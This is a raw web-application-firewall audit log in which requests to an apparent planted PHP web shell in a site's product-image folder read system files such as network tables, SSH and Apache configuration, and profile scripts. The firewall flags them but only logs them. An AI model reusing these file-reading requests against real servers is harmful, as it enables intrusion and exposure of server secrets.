"COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/net/tcp found within ARGS:viewfile: /proc/self/root/proc/net/tcp"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBpfpVkCcfT-Z8NQYyTTwAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100350295069 6819 (- - -) Stopwatch2: 1750100350295069 6819; combined=2408, p1=472, p2=1806, p3=37, p4=39, p5=53, sr=142, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --24c85833-Z-- --f1aec11d-A-- [17/Jun/2025:00:29:52.793307 +0530] aFBpqI3q6eGJ2xNcTd6FYgAAAAU 216.73.216.71 50506 127.0.0.1 7081 --f1aec11d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fnet&viewfile=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fnet%2Ftcp6 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --f1aec11d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3394 Connection: close Content-Type: text/html; charset=UTF-8 --f1aec11d-H-- Message: Warning. Matched phrase "proc/net/tcp" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/net/tcp found within ARGS:viewfile: /proc/self/root/proc/net/tcp6"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/net/tcp" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/net/tcp found within ARGS:viewfile: /proc/self/root/proc/net/tcp6"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBpqI3q6eGJ2xNcTd6FYgAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100392789613 3750 (- - -) Stopwatch2: 1750100392789613 3750; combined=1308, p1=219, p2=995, p3=23, p4=25, p5=46, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f1aec11d-Z-- --30b28d43-A-- [17/Jun/2025:00:30:50.665437 +0530] aFBp4pVkCcfT-Z8NQYyTpgAAAAc 216.73.216.71 37630 127.0.0.1 7081 --30b28d43-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Finit.d&viewfile=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Finit.d%2Fapparmor HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --30b28d43-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4615 Connection: close Content-Type: text/html; charset=UTF-8 --30b28d43-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2599/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2599/etc/init.d/apparmor"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2599/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBp4pVkCcfT-Z8NQYyTpgAAAAc"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2599/etc/init.d/apparmor"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBp4pVkCcfT-Z8NQYyTpgAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100450659980 5512 (- - -) Stopwatch2: 1750100450659980 5512; combined=2410, p1=374, p2=1879, p3=41, p4=33, p5=83, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --30b28d43-Z-- --3e4be31e-A-- [17/Jun/2025:00:30:54.070008 +0530] aFBp5n3hoSwVUy254pHzCAAAACQ 216.73.216.71 38010 127.0.0.1 7081 --3e4be31e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fprofile.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fprofile.d%2Fapps-bin-path.sh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --3e4be31e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3378 Connection: close Content-Type: text/html; charset=UTF-8 --3e4be31e-H-- Message: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /proc/self/root/etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /proc/self/root/etc/profile.d/apps-bin-path.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /proc/self/root/etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBp5n3hoSwVUy254pHzCAAAACQ"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /proc/self/root/etc/profile.d/apps-bin-path.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBp5n3hoSwVUy254pHzCAAAACQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100454065464 4600 (- - -) Stopwatch2: 1750100454065464 4600; combined=2542, p1=381, p2=1981, p3=41, p4=36, p5=103, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3e4be31e-Z-- --e4d7a77c-A-- [17/Jun/2025:00:31:41.374372 +0530] aFBqFY3q6eGJ2xNcTd6F2AAAAAU 216.73.216.71 36044 127.0.0.1 7081 --e4d7a77c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fprofile.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fprofile.d%2Fbash_completion.sh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --e4d7a77c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3336 Connection: close Content-Type: text/html; charset=UTF-8 --e4d7a77c-H-- Message: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /proc/self/root/etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /proc/self/root/etc/profile.d/bash_completion.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /proc/self/root/etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBqFY3q6eGJ2xNcTd6F2AAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /proc/self/root/etc/profile.d/bash_completion.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBqFY3q6eGJ2xNcTd6F2AAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100501370378 4048 (- - -) Stopwatch2: 1750100501370378 4048; combined=2224, p1=365, p2=1681, p3=49, p4=31, p5=98, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e4d7a77c-Z-- --3b07d668-A-- [17/Jun/2025:00:31:55.028118 +0530] aFBqI43q6eGJ2xNcTd6F9gAAAAU 216.73.216.71 46412 127.0.0.1 7081 --3b07d668-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Finit.d&viewfile=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Finit.d%2Fprocps HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --3b07d668-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3545 Connection: close Content-Type: text/html; charset=UTF-8 --3b07d668-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2599/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2599/etc/init.d/procps"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2599/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBqI43q6eGJ2xNcTd6F9gAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2599/etc/init.d/procps"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBqI43q6eGJ2xNcTd6F9gAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100515024177 3994 (- - -) Stopwatch2: 1750100515024177 3994; combined=2092, p1=368, p2=1574, p3=36, p4=30, p5=84, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3b07d668-Z-- --a1778367-A-- [17/Jun/2025:00:32:36.675699 +0530] aFBqTH3hoSwVUy254pHzhAAAACQ 216.73.216.71 58852 127.0.0.1 7081 --a1778367-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Finit.d&viewfile=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Finit.d%2Fudev HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --a1778367-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 5339 Connection: close Content-Type: text/html; charset=UTF-8 --a1778367-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2599/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2599/etc/init.d/udev"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2599/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBqTH3hoSwVUy254pHzhAAAACQ"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2599/etc/init.d/udev"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBqTH3hoSwVUy254pHzhAAAACQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100556671020 4737 (- - -) Stopwatch2: 1750100556671020 4737; combined=2210, p1=365, p2=1687, p3=37, p4=32, p5=89, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a1778367-Z-- --cf2ac23d-A-- [17/Jun/2025:00:33:24.496906 +0530] aFBqfJlL5_2Zd8wUdfLIhgAAAAg 216.73.216.71 52648 127.0.0.1 7081 --cf2ac23d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Fssh%2Fsshd_config.d HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --cf2ac23d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2827 Connection: close Content-Type: text/html; charset=UTF-8 --cf2ac23d-H-- Message: Warning. Matched phrase "etc/ssh/sshd_config" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ssh/sshd_config found within ARGS:path: /snap/core20/2582/etc/ssh/sshd_config.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/ssh/sshd_config" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ssh/sshd_config found within ARGS:path: /snap/core20/2582/etc/ssh/sshd_config.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBqfJlL5_2Zd8wUdfLIhgAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100604493150 3809 (- - -) Stopwatch2: 1750100604493150 3809; combined=2036, p1=342, p2=1569, p3=38, p4=29, p5=58, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cf2ac23d-Z-- --203d0640-A-- [17/Jun/2025:00:33:34.886481 +0530] aFBqho3q6eGJ2xNcTd6GXwAAAAU 216.73.216.71 55430 127.0.0.1 7081 --203d0640-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fapache2&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fapache2%2Fapache2.conf.saved_by_psa.09.02 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --203d0640-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3005 Connection: close Content-Type: text/html; charset=UTF-8 --203d0640-H-- Message: Warning. Matched phrase "etc/apache2/apache2.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apache2/apache2.conf found within ARGS:viewfile: /proc/self/root/etc/apache2/apache2.conf.saved_by_psa.09.02"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/apache2/apache2.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apache2/apache2.conf found within ARGS:viewfile: /proc/self/root/etc/apache2/apache2.conf.saved_by_psa.09.02"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBqho3q6eGJ2xNcTd6GXwAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100614882265 4273 (- - -) Stopwatch2: 1750100614882265 4273; combined=2396, p1=347, p2=1925, p3=34, p4=37, p5=53, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --203d0640-Z-- --930da174-A-- [17/Jun/2025:00:33:38.709746 +0530] aFBqih6Azi2u_ik2Q3KosAAAAAY 216.73.216.71 55894 127.0.0.1 7081 --930da174-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fprofile.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fprofile.d%2Fgawk.csh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --930da174-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3221 Connection: close Content-Type: text/html; charset=UTF-8 --930da174-H-- Message: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /proc/self/root/etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /proc/self/root/etc/profile.d/gawk.csh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /proc/self/root/etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBqih6Azi2u_ik2Q3KosAAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /proc/self/root/etc/profile.d/gawk.csh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBqih6Azi2u_ik2Q3KosAAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100618705072 4729 (- - -) Stopwatch2: 1750100618705072 4729; combined=2563, p1=361, p2=2033, p3=43, p4=35, p5=91, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --930da174-Z-- --0591fa29-A-- [17/Jun/2025:00:33:43.542042 +0530] aFBqjyid3pHxA3RhGpzpzAAAAAk 52.169.50.46 51588 127.0.0.1 7080 --0591fa29-B-- GET /hitech-news.com HTTP/1.0 Host: www.printotech.com X-Real-IP: 52.169.50.46 X-Accel-Internal: /internal-nginx-static-location Connection: close --0591fa29-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 27 Dec 2024 11:52:48 GMT ETag: "328-62a3f1a0472fe" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --0591fa29-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.printotech.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.printotech.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.printotech.com"] [uri "/hitech-news.com"] [unique_id "aFBqjyid3pHxA3RhGpzpzAAAAAk"] Stopwatch: 1750100623539009 3080 (- - -) Stopwatch2: 1750100623539009 3080; combined=1761, p1=307, p2=1399, p3=0, p4=0, p5=55, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache 